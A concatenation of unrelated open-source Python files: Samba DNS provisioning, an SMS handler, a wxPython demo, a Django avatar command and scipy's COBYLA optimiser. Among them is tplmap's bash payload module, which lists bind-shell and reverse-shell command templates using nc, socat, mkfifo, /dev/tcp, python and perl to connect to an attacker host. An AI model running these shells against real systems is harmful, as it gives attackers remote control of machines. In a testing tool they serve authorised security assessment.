# DC=_ldap._tcp.pdc record
add_srv_record(samdb, forest_container_dn, "DC=_ldap._tcp.pdc",
fqdn_hostname, 389)
# DC=gc record
add_host_record(samdb, forest_container_dn, "DC=gc", hostip, hostip6)
# DC=_ldap._tcp.<DOMAINGUID>.domains record
add_srv_record(samdb, forest_container_dn,
"DC=_ldap._tcp.%s.domains" % domainguid, fqdn_hostname, 389)
# DC=<NTDSGUID>
add_cname_record(samdb, forest_container_dn, "DC=%s" % ntdsguid,
fqdn_hostname)
def secretsdb_setup_dns(secretsdb, names, private_dir, realm,
dnsdomain, dns_keytab_path, dnspass, key_version_number):
"""Add DNS specific bits to a secrets database.
:param secretsdb: Ldb Handle to the secrets database
:param names: Names shortcut
:param machinepass: Machine password
"""
try:
os.unlink(os.path.join(private_dir, dns_keytab_path))
except OSError:
pass
if key_version_number is None:
key_version_number = 1
setup_ldb(secretsdb, setup_path("secrets_dns.ldif"), {
"REALM": realm,
"DNSDOMAIN": dnsdomain,
"DNS_KEYTAB": dns_keytab_path,
"DNSPASS_B64": b64encode(dnspass.encode('utf-8')),
"KEY_VERSION_NUMBER": str(key_version_number),
"HOSTNAME": names.hostname,
"DNSNAME" : '%s.%s' % (
names.netbiosname.lower(), names.dnsdomain.lower())
})
def create_dns_dir(logger, paths):
"""Write out a DNS zone file, from the info in the current database.
:param logger: Logger object
:param paths: paths object
"""
dns_dir = os.path.dirname(paths.dns)
try:
shutil.rmtree(dns_dir, True)
except OSError:
pass
os.mkdir(dns_dir, 0770)
if paths.bind_gid is not None:
try:
os.chown(dns_dir, -1, paths.bind_gid)
# chmod needed to cope with umask
os.chmod(dns_dir, 0770)
except OSError:
if not os.environ.has_key('SAMBA_SELFTEST'):
logger.error("Failed to chown %s to bind gid %u" % (
dns_dir, paths.bind_gid))
def create_zone_file(lp, logger, paths, targetdir, dnsdomain,
hostip, hostip6, hostname, realm, domainguid,
ntdsguid, site):
"""Write out a DNS zone file, from the info in the current database.
:param paths: paths object
:param dnsdomain: DNS Domain name
:param domaindn: DN of the Domain
:param hostip: Local IPv4 IP
:param hostip6: Local IPv6 IP
:param hostname: Local hostname
:param realm: Realm name
:param domainguid: GUID of the domain.
:param ntdsguid: GUID of the hosts nTDSDSA record.
"""
assert isinstance(domainguid, str)
if hostip6 is not None:
hostip6_base_line = " IN AAAA " + hostip6
hostip6_host_line = hostname + " IN AAAA " + hostip6
gc_msdcs_ip6_line = "gc._msdcs IN AAAA " + hostip6
else:
hostip6_base_line = ""
hostip6_host_line = ""
gc_msdcs_ip6_line = ""
if hostip is not None:
hostip_base_line = " IN A " + hostip
hostip_host_line = hostname + " IN A " + hostip
gc_msdcs_ip_line = "gc._msdcs IN A " + hostip
else:
hostip_base_line = ""
hostip_host_line = ""
gc_msdcs_ip_line = ""
# we need to freeze the zone while we update the contents
if targetdir is None:
rndc = ' '.join(lp.get("rndc command"))
os.system(rndc + " freeze " + lp.get("realm"))
setup_file(setup_path("provision.zone"), paths.dns, {
"HOSTNAME": hostname,
"DNSDOMAIN": dnsdomain,
"REALM": realm,
"HOSTIP_BASE_LINE": hostip_base_line,
"HOSTIP_HOST_LINE": hostip_host_line,
"DOMAINGUID": domainguid,
"DATESTRING": time.strftime("%Y%m%d%H"),
"DEFAULTSITE": site,
"NTDSGUID": ntdsguid,
"HOSTIP6_BASE_LINE": hostip6_base_line,
"HOSTIP6_HOST_LINE": hostip6_host_line,
"GC_MSDCS_IP_LINE": gc_msdcs_ip_line,
"GC_MSDCS_IP6_LINE": gc_msdcs_ip6_line,
})
if paths.bind_gid is not None:
try:
os.chown(paths.dns, -1, paths.bind_gid)
# chmod needed to cope with umask
os.chmod(paths.dns, 0664)
except OSError:
if not os.environ.has_key('SAMBA_SELFTEST'):
logger.error("Failed to chown %s to bind gid %u" % (
paths.dns, paths.bind_gid))
if targetdir is None:
os.system(rndc + " unfreeze " + lp.get("realm"))
def create_samdb_copy(samdb, logger, paths, names, domainsid, domainguid):
"""Create a copy of samdb and give write permissions to named for dns partitions
"""
private_dir = paths.private_dir
samldb_dir = os.path.join(private_dir, "sam.ldb.d")
dns_dir = os.path.dirname(paths.dns)
dns_samldb_dir = os.path.join(dns_dir, "sam.ldb.d")
# Find the partitions and corresponding filenames
partfile = {}
res = samdb.search(base="@PARTITION", scope=ldb.SCOPE_BASE, attrs=["partition"])
for tmp in res[0]["partition"]:
(nc, fname) = tmp.split(':')
partfile[nc.upper()] = fname
# Create empty domain partition
domaindn = names.domaindn.upper()
domainpart_file = os.path.join(dns_dir, partfile[domaindn])
try:
os.mkdir(dns_samldb_dir)
file(domainpart_file, 'w').close()
# Fill the basedn and @OPTION records in domain partition
dom_ldb = samba.Ldb(domainpart_file)
domainguid_line = "objectGUID: %s\n-" % domainguid
descr = b64encode(get_domain_descriptor(domainsid))
setup_add_ldif(dom_ldb, setup_path("provision_basedn.ldif"), {
"DOMAINDN" : names.domaindn,
"DOMAINGUID" : domainguid_line,
"DOMAINSID" : str(domainsid),
"DESCRIPTOR" : descr})
setup_add_ldif(dom_ldb,
setup_path("provision_basedn_options.ldif"), None)
except:
logger.error(
"Failed to setup database for BIND, AD based DNS cannot be used")
raise
# This line is critical to the security of the whole scheme.
# We assume there is no secret data in the (to be left out of
# date and essentially read-only) config, schema and metadata partitions.
#
# Only the stub of the domain partition is created above.
#
# That way, things like the krbtgt key do not leak.
del partfile[domaindn]
# Link dns partitions and metadata
domainzonedn = "DC=DOMAINDNSZONES,%s" % names.domaindn.upper()
forestzonedn = "DC=FORESTDNSZONES,%s" % names.rootdn.upper()
domainzone_file = partfile[domainzonedn]
forestzone_file = partfile.get(forestzonedn)
metadata_file = "metadata.tdb"
try:
os.link(os.path.join(samldb_dir, metadata_file),
os.path.join(dns_samldb_dir, metadata_file))
os.link(os.path.join(private_dir, domainzone_file),
os.path.join(dns_dir, domainzone_file))
if forestzone_file:
os.link(os.path.join(private_dir, forestzone_file),
os.path.join(dns_dir, forestzone_file))
except OSError:
logger.error(
"Failed to setup database for BIND, AD based DNS cannot be used")
raise
del partfile[domainzonedn]
if forestzone_file:
del partfile[forestzonedn]
# Copy root, config, schema partitions (and any other if any)
# Since samdb is open in the current process, copy them in a child process
try:
tdb_copy(os.path.join(private_dir, "sam.ldb"),
os.path.join(dns_dir, "sam.ldb"))
for nc in partfile:
pfile = partfile[nc]
tdb_copy(os.path.join(private_dir, pfile),
os.path.join(dns_dir, pfile))
except:
logger.error(
"Failed to setup database for BIND, AD based DNS cannot be used")
raise
# Give bind read/write permissions dns partitions
if paths.bind_gid is not None:
try:
os.chown(samldb_dir, -1, paths.bind_gid)
os.chmod(samldb_dir, 0750)
for dirname, dirs, files in os.walk(dns_dir):
for d in dirs:
dpath = os.path.join(dirname, d)
os.chown(dpath, -1, paths.bind_gid)
os.chmod(dpath, 0770)
for f in files:
if f.endswith('.ldb') or f.endswith('.tdb'):
fpath = os.path.join(dirname, f)
os.chown(fpath, -1, paths.bind_gid)
os.chmod(fpath, 0660)
except OSError:
if not os.environ.has_key('SAMBA_SELFTEST'):
logger.error(
"Failed to set permissions to sam.ldb* files, fix manually")
else:
if not os.environ.has_key('SAMBA_SELFTEST'):
logger.warning("""Unable to find group id for BIND,
set permissions to sam.ldb* files manually""")
def create_dns_update_list(lp, logger, paths):
"""Write out a dns_update_list file"""
# note that we use no variable substitution on this file
# the substitution is done at runtime by samba_dnsupdate, samba_spnupdate
setup_file(setup_path("dns_update_list"), paths.dns_update_list, None)
setup_file(setup_path("spn_update_list"), paths.spn_update_list, None)
def create_named_conf(paths, realm, dnsdomain, dns_backend, logger):
"""Write out a file containing zone statements suitable for inclusion in a
named.conf file (including GSS-TSIG configuration).
:param paths: all paths
:param realm: Realm name
:param dnsdomain: DNS Domain name
:param dns_backend: DNS backend type
:param keytab_name: File name of DNS keytab file
:param logger: Logger object
"""
# TODO: This really should have been done as a top level import.
# It is done here to avoid a depencency loop. That is, we move
# ProvisioningError to another file, and have all the provision
# scripts import it from there.
from samba.provision import ProvisioningError
if dns_backend == "BIND9_FLATFILE":
setup_file(setup_path("named.conf"), paths.namedconf, {
"DNSDOMAIN": dnsdomain,
"REALM": realm,
"ZONE_FILE": paths.dns,
"REALM_WC": "*." + ".".join(realm.split(".")[1:]),
"NAMED_CONF": paths.namedconf,
"NAMED_CONF_UPDATE": paths.namedconf_update
})
setup_file(setup_path("named.conf.update"), paths.namedconf_update)
elif dns_backend == "BIND9_DLZ":
bind_info = subprocess.Popen(['named -V'], shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
cwd='.').communicate()[0]
bind9_8 = '#'
bind9_9 = '#'
bind9_10 = '#'
bind9_11 = '#'
if bind_info.upper().find('BIND 9.8') != -1:
bind9_8 = ''
elif bind_info.upper().find('BIND 9.9') != -1:
bind9_9 = ''
elif bind_info.upper().find('BIND 9.10') != -1:
bind9_10 = ''
elif bind_info.upper().find('BIND 9.11') != -1:
bind9_11 = ''
elif bind_info.upper().find('BIND 9.7') != -1:
raise ProvisioningError("DLZ option incompatible with BIND 9.7.")
else:
logger.warning("BIND version unknown, please modify %s manually." % paths.namedconf)
setup_file(setup_path("named.conf.dlz"), paths.namedconf, {
"NAMED_CONF": paths.namedconf,
"MODULESDIR" : samba.param.modules_dir(),
"BIND9_8" : bind9_8,
"BIND9_9" : bind9_9,
"BIND9_10" : bind9_10,
"BIND9_11" : bind9_11
})
def create_named_txt(path, realm, dnsdomain, dnsname, private_dir,
keytab_name):
"""Write out a file containing zone statements suitable for inclusion in a
named.conf file (including GSS-TSIG configuration).
:param path: Path of the new named.conf file.
:param realm: Realm name
:param dnsdomain: DNS Domain name
:param private_dir: Path to private directory
:param keytab_name: File name of DNS keytab file
"""
setup_file(setup_path("named.txt"), path, {
"DNSDOMAIN": dnsdomain,
"DNSNAME" : dnsname,
"REALM": realm,
"DNS_KEYTAB": keytab_name,
"DNS_KEYTAB_ABS": os.path.join(private_dir, keytab_name),
"PRIVATE_DIR": private_dir
})
def is_valid_dns_backend(dns_backend):
return dns_backend in ("BIND9_FLATFILE", "BIND9_DLZ", "SAMBA_INTERNAL", "NONE")
def is_valid_os_level(os_level):
return DS_DOMAIN_FUNCTION_2000 <= os_level <= DS_DOMAIN_FUNCTION_2012_R2
def create_dns_legacy(samdb, domainsid, forestdn, dnsadmins_sid):
# Set up MicrosoftDNS container
add_dns_container(samdb, forestdn, "CN=System", domainsid, dnsadmins_sid)
# Add root servers
add_rootservers(samdb, forestdn, "CN=System")
def fill_dns_data_legacy(samdb, domainsid, forestdn, dnsdomain, site, hostname,
hostip, hostip6, dnsadmins_sid):
# Add domain record
add_domain_record(samdb, forestdn, "CN=System", dnsdomain, domainsid,
dnsadmins_sid)
# Add DNS records for a DC in domain
add_dc_domain_records(samdb, forestdn, "CN=System", site, dnsdomain,
hostname, hostip, hostip6)
def create_dns_partitions(samdb, domainsid, names, domaindn, forestdn,
dnsadmins_sid, fill_level):
# Set up additional partitions (DomainDnsZones, ForstDnsZones)
setup_dns_partitions(samdb, domainsid, domaindn, forestdn,
names.configdn, names.serverdn, fill_level)
# Set up MicrosoftDNS containers
add_dns_container(samdb, domaindn, "DC=DomainDnsZones", domainsid,
dnsadmins_sid)
if fill_level != FILL_SUBDOMAIN:
add_dns_container(samdb, forestdn, "DC=ForestDnsZones", domainsid,
dnsadmins_sid, forest=True)
def fill_dns_data_partitions(samdb, domainsid, site, domaindn, forestdn,
dnsdomain, dnsforest, hostname, hostip, hostip6,
domainguid, ntdsguid, dnsadmins_sid, autofill=True,
fill_level=FILL_FULL):
"""Fill data in various AD partitions
:param samdb: LDB object connected to sam.ldb file
:param domainsid: Domain SID (as dom_sid object)
:param site: Site name to create hostnames in
:param domaindn: DN of the domain
:param forestdn: DN of the forest
:param dnsdomain: DNS name of the domain
:param dnsforest: DNS name of the forest
:param hostname: Host name of this DC
:param hostip: IPv4 addresses
:param hostip6: IPv6 addresses
:param domainguid: Domain GUID
:param ntdsguid: NTDS GUID
:param dnsadmins_sid: SID for DnsAdmins group
:param autofill: Create DNS records (using fixed template)
"""
##### Set up DC=DomainDnsZones,<DOMAINDN>
# Add rootserver records
add_rootservers(samdb, domaindn, "DC=DomainDnsZones")
# Add domain record
add_domain_record(samdb, domaindn, "DC=DomainDnsZones", dnsdomain,
domainsid, dnsadmins_sid)
# Add DNS records for a DC in domain
if autofill:
add_dc_domain_records(samdb, domaindn, "DC=DomainDnsZones", site,
dnsdomain, hostname, hostip, hostip6)
if fill_level != FILL_SUBDOMAIN:
##### Set up DC=ForestDnsZones,<FORESTDN>
# Add _msdcs record
add_msdcs_record(samdb, forestdn, "DC=ForestDnsZones", dnsforest)
# Add DNS records for a DC in forest
if autofill:
add_dc_msdcs_records(samdb, forestdn, "DC=ForestDnsZones", site,
dnsforest, hostname, hostip, hostip6,
domainguid, ntdsguid)
def setup_ad_dns(samdb, secretsdb, names, paths, lp, logger,
dns_backend, os_level, dnspass=None, hostip=None, hostip6=None,
targetdir=None, fill_level=FILL_FULL):
"""Provision DNS information (assuming GC role)
:param samdb: LDB object connected to sam.ldb file
:param secretsdb: LDB object connected to secrets.ldb file
:param names: Names shortcut
:param paths: Paths shortcut
:param lp: Loadparm object
:param logger: Logger object
:param dns_backend: Type of DNS backend
:param os_level: Functional level (treated as os level)
:param dnspass: Password for bind's DNS account
:param hostip: IPv4 address
:param hostip6: IPv6 address
:param targetdir: Target directory for creating DNS-related files for BIND9
"""
if not is_valid_dns_backend(dns_backend):
raise Exception("Invalid dns backend: %r" % dns_backend)
if not is_valid_os_level(os_level):
raise Exception("Invalid os level: %r" % os_level)
if dns_backend == "NONE":
logger.info("No DNS backend set, not configuring DNS")
return
# Add dns accounts (DnsAdmins, DnsUpdateProxy) in domain
logger.info("Adding DNS accounts")
add_dns_accounts(samdb, names.domaindn)
# If dns_backend is BIND9_FLATFILE
# Populate only CN=MicrosoftDNS,CN=System,<DOMAINDN>
#
# If dns_backend is SAMBA_INTERNAL or BIND9_DLZ
# Populate DNS partitions
# If os_level < 2003 (DS_DOMAIN_FUNCTION_2000)
# All dns records are in CN=MicrosoftDNS,CN=System,<DOMAINDN>
#
# If os_level >= 2003 (DS_DOMAIN_FUNCTION_2003, DS_DOMAIN_FUNCTION_2008,
# DS_DOMAIN_FUNCTION_2008_R2)
# Root server records are in CN=MicrosoftDNS,CN=System,<DOMAINDN>
# Domain records are in CN=MicrosoftDNS,CN=System,<DOMAINDN>
# Domain records are in CN=MicrosoftDNS,DC=DomainDnsZones,<DOMAINDN>
# Forest records are in CN=MicrosoftDNS,DC=ForestDnsZones,<FORESTDN>
domaindn = names.domaindn
forestdn = samdb.get_root_basedn().get_linearized()
dnsdomain = names.dnsdomain.lower()
dnsforest = dnsdomain
site = names.sitename
hostname = names.netbiosname.lower()
dnsadmins_sid = get_dnsadmins_sid(samdb, domaindn)
domainguid = get_domainguid(samdb, domaindn)
samdb.transaction_start()
try:
# Create CN=System
logger.info("Creating CN=MicrosoftDNS,CN=System,%s" % domaindn)
create_dns_legacy(samdb, names.domainsid, domaindn, dnsadmins_sid)
if os_level == DS_DOMAIN_FUNCTION_2000:
# Populating legacy dns
logger.info("Populating CN=MicrosoftDNS,CN=System,%s" % domaindn)
fill_dns_data_legacy(samdb, names.domainsid, domaindn, dnsdomain, site,
hostname, hostip, hostip6, dnsadmins_sid)
elif dns_backend in ("SAMBA_INTERNAL", "BIND9_DLZ") and \
os_level >= DS_DOMAIN_FUNCTION_2003:
# Create DNS partitions
logger.info("Creating DomainDnsZones and ForestDnsZones partitions")
create_dns_partitions(samdb, names.domainsid, names, domaindn, forestdn,
dnsadmins_sid, fill_level)
# Populating dns partitions
logger.info("Populating DomainDnsZones and ForestDnsZones partitions")
fill_dns_data_partitions(samdb, names.domainsid, site, domaindn, forestdn,
dnsdomain, dnsforest, hostname, hostip, hostip6,
domainguid, names.ntdsguid, dnsadmins_sid,
fill_level=fill_level)
except:
samdb.transaction_cancel()
raise
else:
samdb.transaction_commit()
if dns_backend.startswith("BIND9_"):
setup_bind9_dns(samdb, secretsdb, names, paths, lp, logger,
dns_backend, os_level, site=site, dnspass=dnspass, hostip=hostip,
hostip6=hostip6, targetdir=targetdir)
def setup_bind9_dns(samdb, secretsdb, names, paths, lp, logger,
dns_backend, os_level, site=None, dnspass=None, hostip=None,
hostip6=None, targetdir=None, key_version_number=None):
"""Provision DNS information (assuming BIND9 backend in DC role)
:param samdb: LDB object connected to sam.ldb file
:param secretsdb: LDB object connected to secrets.ldb file
:param names: Names shortcut
:param paths: Paths shortcut
:param lp: Loadparm object
:param logger: Logger object
:param dns_backend: Type of DNS backend
:param os_level: Functional level (treated as os level)
:param site: Site to create hostnames in
:param dnspass: Password for bind's DNS account
:param hostip: IPv4 address
:param hostip6: IPv6 address
:param targetdir: Target directory for creating DNS-related files for BIND9
"""
if (not is_valid_dns_backend(dns_backend) or
not dns_backend.startswith("BIND9_")):
raise Exception("Invalid dns backend: %r" % dns_backend)
if not is_valid_os_level(os_level):
raise Exception("Invalid os level: %r" % os_level)
domaindn = names.domaindn
domainguid = get_domainguid(samdb, domaindn)
secretsdb_setup_dns(secretsdb, names,
paths.private_dir, realm=names.realm,
dnsdomain=names.dnsdomain,
dns_keytab_path=paths.dns_keytab, dnspass=dnspass,
key_version_number=key_version_number)
dns_keytab_path = os.path.join(paths.private_dir, paths.dns_keytab)
if os.path.isfile(dns_keytab_path) and paths.bind_gid is not None:
try:
os.chmod(dns_keytab_path, 0640)
os.chown(dns_keytab_path, -1, paths.bind_gid)
except OSError:
if not os.environ.has_key('SAMBA_SELFTEST'):
logger.info("Failed to chown %s to bind gid %u",
dns_keytab_path, paths.bind_gid)
create_dns_dir(logger, paths)
if dns_backend == "BIND9_FLATFILE":
create_zone_file(lp, logger, paths, targetdir, site=site,
dnsdomain=names.dnsdomain, hostip=hostip,
hostip6=hostip6, hostname=names.hostname,
realm=names.realm, domainguid=domainguid,
ntdsguid=names.ntdsguid)
if dns_backend == "BIND9_DLZ" and os_level >= DS_DOMAIN_FUNCTION_2003:
create_samdb_copy(samdb, logger, paths, names, names.domainsid, domainguid)
create_named_conf(paths, realm=names.realm,
dnsdomain=names.dnsdomain, dns_backend=dns_backend,
logger=logger)
create_named_txt(paths.namedtxt,
realm=names.realm, dnsdomain=names.dnsdomain,
dnsname = "%s.%s" % (names.hostname, names.dnsdomain),
private_dir=paths.private_dir,
keytab_name=paths.dns_keytab)
logger.info("See %s for an example configuration include file for BIND",
paths.namedconf)
logger.info("and %s for further documentation required for secure DNS "
"updates", paths.namedtxt)
| freenas/samba | python/samba/provision/sambadns.py | Python | gpl-3.0 | 46,997 |
#
# pysmsd.handler.print_handler.py
#
# Copyright 2010 Helsinki Institute for Information Technology
# and the authors.
#
# Authors: Jani Turunen <jani.turunen@hiit.fi>
# Konrad Markus <konrad.markus@hiit.fi>
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
import logging
from pysmsd.handlers import BaseSMSHandler
from pysmsd.db import db
class Handler(BaseSMSHandler):
def handle(self, db_path, id):
m = db.get_in_message(db_path, id)
logging.info(m)
| sizzlelab/pysmsd | pysmsd/handlers/print_handler.py | Python | mit | 1,500 |
echo = """echo '%(s1)s'"""
bind_shell = [
"""python -c 'import pty,os,socket;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind(("", %(port)s));s.listen(1);(rem, addr) = s.accept();os.dup2(rem.fileno(),0);os.dup2(rem.fileno(),1);os.dup2(rem.fileno(),2);pty.spawn("%(shell)s");s.close()'""",
"""nc -l -p %(port)s -e %(shell)s""",
"""rm -rf /tmp/f;mkfifo /tmp/f;cat /tmp/f|%(shell)s -i 2>&1|nc -l %(port)s >/tmp/f; rm -rf /tmp/f""",
"""socat tcp-l:%(port)s exec:%(shell)s"""
]
reverse_shell = [
"""sleep 1; rm -rf /tmp/f;mkfifo /tmp/f;cat /tmp/f|%(shell)s -i 2>&1|nc %(host)s %(port)s >/tmp/f""",
"""sleep 1; nc -e %(shell)s %(host)s %(port)s""",
"""sleep 1; python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%(host)s",%(port)s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["%(shell)s","-i"]);'""",
"sleep 1; /bin/bash -c \'%(shell)s 0</dev/tcp/%(host)s/%(port)s 1>&0 2>&0\'",
"""perl -e 'use Socket;$i="%(host)s";$p=%(port)s;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("%(shell)s -i");};'""",
# TODO: ruby payload's broken, fix it.
# """ruby -rsocket -e'f=TCPSocket.open("%(host)s",%(port)s).to_i;exec sprintf("%(shell)s -i <&%%d >&%%d 2>&%%d",f,f,f)'""",
"""sleep 1; python -c 'import socket,pty,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%(host)s",%(port)s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);pty.spawn("%(shell)s");'""",
] | SecHackLabs/WebHackSHL | modules/tplmap/plugins/languages/bash.py | Python | gpl-3.0 | 1,643 |
#!/usr/bin/env python
"""
A Simple wx example to test PyDev's event loop integration.
To run this:
1) Enable the PyDev GUI event loop integration for wx
2) do an execfile on this script
3) ensure you have a working GUI simultaneously with an
interactive console
Ref: Modified from wxPython source code wxPython/samples/simple/simple.py
"""
if __name__ == '__main__':
import wx
class MyFrame(wx.Frame):
"""
This is MyFrame. It just shows a few controls on a wxPanel,
and has a simple menu.
"""
def __init__(self, parent, title):
wx.Frame.__init__(self, parent, -1, title,
pos=(150, 150), size=(350, 200))
# Create the menubar
menuBar = wx.MenuBar()
# and a menu
menu = wx.Menu()
# add an item to the menu, using \tKeyName automatically
# creates an accelerator, the third param is some help text
# that will show up in the statusbar
menu.Append(wx.ID_EXIT, "E&xit\tAlt-X", "Exit this simple sample")
# bind the menu event to an event handler
self.Bind(wx.EVT_MENU, self.OnTimeToClose, id=wx.ID_EXIT)
# and put the menu on the menubar
menuBar.Append(menu, "&File")
self.SetMenuBar(menuBar)
self.CreateStatusBar()
# Now create the Panel to put the other controls on.
panel = wx.Panel(self)
# and a few controls
text = wx.StaticText(panel, -1, "Hello World!")
text.SetFont(wx.Font(14, wx.SWISS, wx.NORMAL, wx.BOLD))
text.SetSize(text.GetBestSize())
btn = wx.Button(panel, -1, "Close")
funbtn = wx.Button(panel, -1, "Just for fun...")
# bind the button events to handlers
self.Bind(wx.EVT_BUTTON, self.OnTimeToClose, btn)
self.Bind(wx.EVT_BUTTON, self.OnFunButton, funbtn)
# Use a sizer to layout the controls, stacked vertically and with
# a 10 pixel border around each
sizer = wx.BoxSizer(wx.VERTICAL)
sizer.Add(text, 0, wx.ALL, 10)
sizer.Add(btn, 0, wx.ALL, 10)
sizer.Add(funbtn, 0, wx.ALL, 10)
panel.SetSizer(sizer)
panel.Layout()
def OnTimeToClose(self, evt):
"""Event handler for the button click."""
print("See ya later!")
self.Close()
def OnFunButton(self, evt):
"""Event handler for the button click."""
print("Having fun yet?")
class MyApp(wx.App):
def OnInit(self):
frame = MyFrame(None, "Simple wxPython App")
self.SetTopWindow(frame)
print("Print statements go to this stdout window by default.")
frame.Show(True)
return True
if __name__ == '__main__':
app = wx.GetApp()
if app is None:
app = MyApp(redirect=False, clearSigInt=False)
else:
frame = MyFrame(None, "Simple wxPython App")
app.SetTopWindow(frame)
print("Print statements go to this stdout window by default.")
frame.Show(True)
| roscoeZA/GeoGigSync | pydev/tests_mainloop/gui-wx.py | Python | cc0-1.0 | 3,445 |
from django.core.management.base import NoArgsCommand
from django.conf import settings
from avatar.models import Avatar
from avatar.models import AUTO_GENERATE_AVATAR_SIZES
class Command(NoArgsCommand):
help = "Regenerates avatar thumbnails for the sizes specified in " + \
"settings.AUTO_GENERATE_AVATAR_SIZES."
def handle_noargs(self, **options):
for avatar in Avatar.objects.all():
for size in AUTO_GENERATE_AVATAR_SIZES:
print "Rebuilding Avatar id=%s at size %s." % (avatar.id, size)
avatar.create_thumbnail(size)
| amarandon/smeuhsocial | apps/avatar/management/commands/rebuild_avatars.py | Python | mit | 594 |
"""
Interface to Constrained Optimization By Linear Approximation
Functions
---------
.. autosummary::
:toctree: generated/
fmin_cobyla
"""
from __future__ import division, print_function, absolute_import
import numpy as np
from scipy.lib.six import callable
from scipy.optimize import _cobyla
from .optimize import Result, _check_unknown_options
from warnings import warn
__all__ = ['fmin_cobyla']
def fmin_cobyla(func, x0, cons, args=(), consargs=None, rhobeg=1.0, rhoend=1e-4,
iprint=1, maxfun=1000, disp=None):
"""
Minimize a function using the Constrained Optimization BY Linear
Approximation (COBYLA) method. This method wraps a FORTRAN
implentation of the algorithm.
Parameters
----------
func : callable
Function to minimize. In the form func(x, \\*args).
x0 : ndarray
Initial guess.
cons : sequence
Constraint functions; must all be ``>=0`` (a single function
if only 1 constraint). Each function takes the parameters `x`
as its first argument.
args : tuple
Extra arguments to pass to function.
consargs : tuple
Extra arguments to pass to constraint functions (default of None means
use same extra arguments as those passed to func).
Use ``()`` for no extra arguments.
rhobeg :
Reasonable initial changes to the variables.
rhoend :
Final accuracy in the optimization (not precisely guaranteed). This
is a lower bound on the size of the trust region.
iprint : {0, 1, 2, 3}
Controls the frequency of output; 0 implies no output. Deprecated.
disp : {0, 1, 2, 3}
Over-rides the iprint interface. Preferred.
maxfun : int
Maximum number of function evaluations.
Returns
-------
x : ndarray
The argument that minimises `f`.
See also
--------
minimize: Interface to minimization algorithms for multivariate
functions. See the 'COBYLA' `method` in particular.
Notes
-----
This algorithm is based on linear approximations to the objective
function and each constraint. We briefly describe the algorithm.
Suppose the function is being minimized over k variables. At the
jth iteration the algorithm has k+1 points v_1, ..., v_(k+1),
an approximate solution x_j, and a radius RHO_j.
(i.e. linear plus a constant) approximations to the objective
function and constraint functions such that their function values
agree with the linear approximation on the k+1 points v_1,.., v_(k+1).
This gives a linear program to solve (where the linear approximations
of the constraint functions are constrained to be non-negative).
However the linear approximations are likely only good
approximations near the current simplex, so the linear program is
given the further requirement that the solution, which
will become x_(j+1), must be within RHO_j from x_j. RHO_j only
decreases, never increases. The initial RHO_j is rhobeg and the
final RHO_j is rhoend. In this way COBYLA's iterations behave
like a trust region algorithm.
Additionally, the linear program may be inconsistent, or the
approximation may give poor improvement. For details about
how these issues are resolved, as well as how the points v_i are
updated, refer to the source code or the references below.
References
----------
Powell M.J.D. (1994), "A direct search optimization method that models
the objective and constraint functions by linear interpolation.", in
Advances in Optimization and Numerical Analysis, eds. S. Gomez and
J-P Hennart, Kluwer Academic (Dordrecht), pp. 51-67
Powell M.J.D. (1998), "Direct search algorithms for optimization
calculations", Acta Numerica 7, 287-336
Powell M.J.D. (2007), "A view of algorithms for optimization without
derivatives", Cambridge University Technical Report DAMTP 2007/NA03
Examples
--------
Minimize the objective function f(x,y) = x*y subject
to the constraints x**2 + y**2 < 1 and y > 0::
>>> def objective(x):
... return x[0]*x[1]
...
>>> def constr1(x):
... return 1 - (x[0]**2 + x[1]**2)
...
>>> def constr2(x):
... return x[1]
...
>>> fmin_cobyla(objective, [0.0, 0.1], [constr1, constr2], rhoend=1e-7)
Normal return from subroutine COBYLA
NFVALS = 64 F =-5.000000E-01 MAXCV = 1.998401E-14
X =-7.071069E-01 7.071067E-01
array([-0.70710685, 0.70710671])
The exact solution is (-sqrt(2)/2, sqrt(2)/2).
"""
err = "cons must be a sequence of callable functions or a single"\
" callable function."
try:
m = len(cons)
except TypeError:
if callable(cons):
m = 1
cons = [cons]
else:
raise TypeError(err)
else:
for thisfunc in cons:
if not callable(thisfunc):
raise TypeError(err)
if consargs is None:
consargs = args
# build constraints
con = tuple({'type': 'ineq', 'fun': c, 'args': consargs} for c in cons)
# options
if disp is not None:
iprint = disp
opts = {'rhobeg': rhobeg,
'tol': rhoend,
'iprint': iprint,
'disp' : iprint != 0,
'maxiter': maxfun}
return _minimize_cobyla(func, x0, args, constraints=con,
**opts)['x']
def _minimize_cobyla(fun, x0, args=(), constraints=(),
rhobeg=1.0, tol=1e-4, iprint=1, maxiter=1000,
disp=False, **unknown_options):
"""
Minimize a scalar function of one or more variables using the
Constrained Optimization BY Linear Approximation (COBYLA) algorithm.
Options for the COBYLA algorithm are:
rhobeg : float
Reasonable initial changes to the variables.
tol : float
Final accuracy in the optimization (not precisely guaranteed).
This is a lower bound on the size of the trust region.
disp : bool
Set to True to print convergence messages. If False,
`verbosity` is ignored as set to 0.
maxiter : int
Maximum number of function evaluations.
This function is called by the `minimize` function with
`method=COBYLA`. It is not supposed to be called directly.
"""
